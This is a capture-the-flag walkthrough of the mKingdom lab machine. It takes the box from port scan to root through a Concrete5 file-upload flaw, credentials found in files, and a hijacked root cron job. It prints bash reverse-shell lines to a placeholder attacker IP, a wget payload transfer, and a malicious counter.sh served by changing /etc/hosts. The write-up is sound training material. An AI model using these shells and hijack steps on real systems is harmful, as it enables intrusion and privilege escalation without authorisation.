mKingdom
I. Reconnaissance and Enumeration
export TARGET_IP=10.10.109.114
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
85/tcp open mit-ml-dev
Web Service Enumeration
-
Initial Access: Browsing to
http://$TARGET_IP:85
reveals a seemingly empty page. -
Directory Brute-Forcing
feroxbuster -u http://$TARGET_IP:85 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200
- Results: The scan reveals
/app/
, which redirects to/app/castle/
. - Analysis: The redirect suggests a structured web application, possibly a Content Management System (CMS).
- Results: The scan reveals
-
CMS Identification:
- Method: Examining the HTML source code of
http://$TARGET_IP:85/app/castle/
reveals:<meta name="generator" content="concrete5 - 8.5.2"/>
- Analysis: The
meta
tag clearly identifies the CMS as Concrete5 version 8.5.2.
- Method: Examining the HTML source code of
II. Vulnerability Analysis
- Vulnerability Research: A search for "Concrete5 8.5.2 exploit" reveals a known Remote Code Execution (RCE) vulnerability related to the File Manager. The vulnerability allows authenticated users to upload malicious files, leading to code execution.
III. Exploitation
This section details the steps taken to exploit the identified vulnerability.
-
Step 1: Gaining Initial Access (Authentication Bypass/Brute-Force):
- Method: The login page is located at the bottom of the website via a "Log in" link.
- Attempt 1 (Brute-Force): Attempting to brute-force the "admin" user (a common default) resulted in an IP ban. This highlights the importance of careful reconnaissance and avoiding noisy techniques when possible.
- Attempt 2 (Default Credentials): Trying common credentials like
admin:password
successfully granted administrative access.
-
Step 2: Adding PHP as an Allowed File Type:
- Navigation: Within the Concrete5 admin interface, navigate to "System & Settings" -> "Allowed File Types."
- Action: Add "php" to the list of allowed file extensions.
- Explanation: This step is necessary because Concrete5, by default, restricts the types of files that can be uploaded for security reasons. We're intentionally bypassing this protection.
-
Step 3: Uploading a PHP Reverse Shell:
- Shell Generation: A PHP reverse shell can be generated using tools like
msfvenom
(part of the Metasploit Framework) or online generators like https://www.revshells.com/. - Example (Conceptual - adapt to your attacker IP and port):
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_ATTACKER_IP/YOUR_PORT 0>&1'");
?>- Upload: Navigate to the "File Manager" ("Files" -> "Upload Files") and upload the generated PHP shell (e.g.,
shell.php
).
- Shell Generation: A PHP reverse shell can be generated using tools like
-
Step 4: Triggering the Reverse Shell:
- Listener Setup: On the attacker machine, start a Netcat listener:
nc -lvnp YOUR_PORT
- Execution: Access the uploaded shell through its URL provided by the CMS (e.g.,
http://$TARGET_IP:85/application/files/SOMEPATH/shell.php
). - Result: A successful connection will appear on the Netcat listener, providing a shell as the
www-data
user.
- Listener Setup: On the attacker machine, start a Netcat listener:
-
Step 5: Shell Sanitization
- Explanation: Terminal sanitization is a crucial step to improve the stability and usability of a reverse shell obtained on a target system. Raw reverse shells often lack features like command history, tab completion, and proper terminal handling, making interaction difficult.
- Steps:
- Background the shell:
script /dev/null -c bash
thenCTRL + Z
- Prepare the terminal:
stty raw -echo; fg
stty raw
: Sets the terminal to raw mode, allowing direct input/output.-echo
: Disables echoing of input characters (prevents double characters).fg
: Brings the shell back to the foreground.
- Reset the terminal:
reset xterm
or,reset
then enter the terminal type that best applies, for this example it'sxterm
. - Set environment variables:
export TERM=xterm
: Sets the terminal type for proper display and features.export SHELL=/bin/bash
: Specifies the shell to use.
- Adjust terminal size:
stty size
(on your attacker machine, in a normal terminal, to get your usual terminal dimensions).stty rows <ROWS> columns <COLUMNS>
(in the sanitized shell, replacing<ROWS>
and<COLUMNS>
with the values fromstty size
).
- Background the shell:
IV. Privilege Escalation (www-data
to toad
)
-
Database Enumeration: Since Concrete5 uses a database, we look for credentials.
- Command:
cat /var/www/html/app/castle/application/config/database.php
- Result: This reveals database credentials:
toad:toadisthebest
. This highlights the importance of securing configuration files.
- Command:
-
User Switching:
- Command:
su toad
- Password:
toadisthebest
- Result: We successfully switch to the
toad
user.
- Command:
V. Privilege Escalation (toad
to mario
)
-
Bashrc Enumeration
- Command:
cat /home/toad/.bashrc
- Result: The
.bashrc
file contains:export PWD_token='aWthVGVOVEFOdEVTCg=='
- Command:
-
Bashrc Exploitation
- Command:
echo "aWthVGVOVEFOdEVTCg==" | base64 -d
- Result: The command decodes a base64 to find:
ikaTeNTANtES
- Command:
-
User Switching:
- Command:
su mario
- Password:
ikaTeNTANtES
- Result: Successfully switched to the
mario
user.
- Command:
-
Reading user.txt (SUID Binary):
- Initial Attempt:
cat /home/toad/user.txt
results in "Permission denied." - SUID Check:
ls -l /bin/cat
shows that/bin/cat
has the SUID bit set and is owned bytoad
. This means it executes withtoad
's privileges, notmario
's. - Alternative Commands: Since we can't directly use
/bin/cat
, we use other commands that can read files without needingtoad
's privileges:nano /home/toad/user.txt
head /home/toad/user.txt
less /home/toad/user.txt
tail /home/toad/user.txt
grep . /home/toad/user.txt
- Explanation: The SUID (Set User ID) bit is a special permission that allows a file to be executed with the privileges of the file's owner, not the user running the command. In this case, /bin/cat has a SUID.
- Initial Attempt:
VI. Privilege Escalation (mario
to root
)
-
Process Monitoring (pspy):
- Transfer pspy64: Use a web server on the attacker machine (
python3 -m http.server 6666
) to transferpspy64
to the target machine (wget http://ATTACKER_IP:6666/pspy64
). - Execution:
chmod +x pspy64 && ./pspy64
- Observation:
pspy64
reveals a cron job running as root:2025/02/08 06:38:01 CMD: UID=0 PID=2653 | curl mkingdom.thm:85/app/castle/application/counter.sh
2025/02/08 06:38:01 CMD: UID=0 PID=2652 | /bin/sh -c curl mkingdom.thm:85/app/castle/application/counter.sh | bash >> /var/log/up.log - Analysis: Root periodically fetches and executes
counter.sh
frommkingdom.thm
. This is a classic command injection vulnerability via a misconfigured cron job.
- Transfer pspy64: Use a web server on the attacker machine (
-
Exploiting the Cron Job (DNS Hijacking):
- Understanding the Vulnerability: We can't modify
counter.sh
directly on the server. However, we can control the DNS resolution ofmkingdom.thm
using the/etc/hosts
file. - Modifying /etc/hosts: Edit
/etc/hosts
on the target machine (nano /etc/hosts
) and change the entry formkingdom.thm
to point to the attacker's IP address:# Replace: 127.0.1.1 mkingdom.thm
# With: YOUR_ATTACKER_IP mkingdom.thm - Creating a Malicious counter.sh: On the attacker machine, create the same directory structure as seen in the cron job output and create a malicious
counter.sh
:mkdir -p app/castle/application/
echo '#!/bin/bash' > app/castle/application/counter.sh
echo "sh -i >& /dev/tcp/YOUR_ATTACKER_IP/7777 0>&1" >> app/castle/application/counter.sh
# Explanation of the payload:
# sh -i: Starts an interactive shell.
# >& /dev/tcp/YOUR_ATTACKER_IP/7777: Redirects both standard output (>) and standard error (&) to a TCP connection on your attacker's IP and port 7777. This creates the reverse shell.
# 0>&1: Redirects standard input (0) to the same location as standard output (1), ensuring the shell is interactive. - Setting up a Web Server: On the attacker machine, start a web server in the directory containing the
app
folder:python3 -m http.server 85
- Setting up a Listener: On the attacker machine, start a Netcat listener:
nc -lvnp 7777
- Waiting for the Cron Job: When the cron job runs, it will download the malicious
counter.sh
from the attacker's web server and execute it, establishing a reverse shell as root.
- Understanding the Vulnerability: We can't modify